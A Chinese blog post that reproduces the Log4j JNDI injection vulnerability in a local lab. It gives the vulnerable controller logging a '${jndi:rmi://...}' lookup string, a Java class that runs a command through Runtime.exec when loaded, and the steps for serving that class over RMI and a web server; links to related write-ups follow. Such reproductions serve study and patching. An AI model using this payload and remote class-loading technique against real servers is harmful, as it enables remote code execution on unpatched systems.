完整log4j漏洞复现

最新推荐文章于 2024-06-09 12:59:42 发布
最新推荐文章于 2024-06-09 12:59:42 发布
阅读量2.9k 收藏
点赞数
分类专栏: JAVA 文章标签: java 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a748448660/article/details/122247066
版权

1.环境

log4j-core 2.7
log4j-api 2.7
jdk 1.8

2.核心要点

核心的漏洞代码在于org.apache.logging.log4j.core.lookup.StrSubstitutor 该类中,首先利用idea 全局搜索以下方法。


   protected String resolveVariable(final LogEvent event, final String variableName, final StringBuilder buf,
                                     final int startPos, final int endPos) {
        final StrLookup resolver = getVariableResolver();
        if (resolver == null) {
            return null;
        }
        return resolver.lookup(event, variableName);
    }

并在关键位置打断点
在这里插入图片描述
方法执行到该处才算成功。

3 .搭建攻击服务与被攻击服务

被攻击服务,其主要代码如下:

import org.apache.log4j.Logger;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.RequestMapping;

import javax.servlet.http.HttpServletResponse;

@Controller
@RequestMapping("Test")
public class TestController {
    Logger log = Logger.getLogger(TestController.class);

    @RequestMapping("/test")
    public String index(Model model, HttpServletResponse response) {
        log.info("${jndi:rmi://127.0.0.1:1099/Test}"); //指向rmi服务
        return "index";
    }
}

主要步骤: 攻击者服务需要一个web服务存放执行脚本,然后再用rmi指向该web服务。
利用Python开启一个简单的web服务,并放上攻击脚本,放在其目录下:
在这里插入图片描述
打开计算器的脚本:

public class MyServer {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"calc"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
           
        }
    }
}

再用rmi指向该服务
在这里插入图片描述

最后执行被攻击者的代码,可以通过web发起http请求:

在这里插入图片描述
主要看是否进入断点,最好不要同时引入logback.jar这个包,要不然跳不进断点。最终弹出计算器:

在这里插入图片描述
仅供学习交流!!!
参考:
[1]: https://www.cnblogs.com/wbo112/p/15690699.html
[2]: https://zhuanlan.zhihu.com/p/443640671

追风筝的摆渡人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全 log4j漏洞复现
jazzz98的博客
06-19 3733
log4j被爆出“史诗级”漏洞。其危害非常大,影响非常广。该漏洞非常容易利用,可以执行任意代码。这个漏洞的影响可谓是重量级的。
ArcGIS漏洞修补工具(Log4J
01-18
ArcGIS Enterprise 10.9.1及以下版本的 log4j 漏洞修补工具
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 6913
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
CVE Log4j2的远程代码执行漏洞的IDEA复现
最新发布
8888的博客
06-09 939
攻击者构造一个恶意的class文件,然后上传到服务器上,开始监听,然后我们要客户端用构造的JNDI 去查找目标服务器的LDAP的数据,我们构造一个不存在的数据让他找,他找不到,然后会自动去执行我们传上去的地址去下载,下载完以后会自动执行。,它使用的最大优势就是可以将不同系统的数据集中在一起,从而避免了我们每次访问不同系统时都需要登录账号密码,使用LDAP,可以使我们只用登录一个账号和密码就可以找到我们需要的数据。在LDAP寻找不到我们查找的数据的时候,它就会自动执行我们传上去的恶意地址去下载,并且执行。
log4j漏洞复现
weixin_68647219的博客
04-20 4591
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。
冰河连夜复现Log4j最新史诗级重大漏洞,含视频和完整案例代码,全网最全,赶快收藏吧
冰河的专栏
05-30 3897
周末与一些小伙伴交流的过程当中,发现一些小伙伴公司的项目中使用的Log4j版本还是2.14.0,我一听就有点震惊了:你们还在使用Log4j的2.14.0版本,这个版本存在重大漏洞啊!但是有些小伙伴看起来对Log4j中存在的重大漏洞不以为意。“我们项目中使用的Log4j一直是2.14.0这个版本啊,一直没啥问题啊!”。哎,看来有些小伙伴对Log4j2.14.0版本存在的漏洞还是不太了解呀,于是我连夜录制了复现Log4j最新重大漏洞的视频,发布到了B站。
Apache Log4j2(CVE-2021-4101)远程代码执行漏洞复现
今天是几号的博客
04-12 2654
Apache log4j是Apache的一个开源项目,Java的日志记录工具(同logback)。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 影响范围 Apache Log4j 2.x
Apache log4j2 远程命令执行漏洞复现及修复方案
杨小熊学习笔记
12-14 6411
1. 漏洞信息 漏洞软件: Apache Log4j2 漏洞编号:CVE-2021-44228 漏洞描述:Apache Log4j2 远程命令执行 时间:2021-11-26 漏洞详情:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 漏洞影响范围版本:2.0.beta9 to 2.14.1 2. 排查指导 查看引用了 log4j-api 和 log4j-core 两个jar包,如maven依赖: <depend
Log4J漏洞本地快速复现
crowsec
12-20 3390
微信公众号:乌鸦安全 扫取二维码获取更多信息! 01.参 考 资 料 本复现大量参考: https://github.com/Yihsiwei/Log4j-exp 本次复现仅仅帮助他人本地复现漏洞。 在网上已经有很多人复现漏洞,但是对于不会java的童鞋,又想研究后续命令执行上线的童鞋来说,无疑是非常困难的,于是对比了几个版本之后,在这里对于本地漏洞复现做一个文字记录。 请大家严格遵守《漏洞管理条例》和《网络安全法》 02.本地复现步骤 复现环境:wind...
Log4j复现过程
weixin_50339832的博客
12-26 2378
log4j是一个记录日志的组件,用来对程序状态进行动态记录, logger.info("system propety: ${jndi:schema://url}"); jndi:jndi解析器通过jdk获取内容,反序列化为java对象作为jndi, 并打印,jndi就是这个从外部查找得到的java对象。 schema:获取方式,jdk支持多种不同的查找方式,包括 corbname, dns, iiop, iiopname, ldap, ldaps, rmi 因ldap写法简单,被作为常用的获取方式
Log4j2 RCE漏洞复现
守拙的博客
12-10 4487
最新log4j rce漏洞复现
Log4j2漏洞
热门推荐
qq_20025777的博客
12-10 2万+
Log4j2漏洞危害:高危、远程代码执行
漏洞log4j2远程执行代码复现实操代码例子
肉段_Dxd的博客
12-11 4305
关于近日log4j漏洞导致的远程执行代码的复现例子,利用JNDI的ldap攻击,使远程服务可能执行了恶意代码
log4j漏洞复现vulhub靶场
08-14
要在 Vulhub 靶场中复现 log4j 漏洞,你可以按照以下步骤进行操作: 1. 安装 Docker 和 Docker Compose:确保你的系统已经安装了 Docker 和 Docker Compose 工具。 2. 克隆 Vulhub 仓库:在命令行中执行以下命令,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值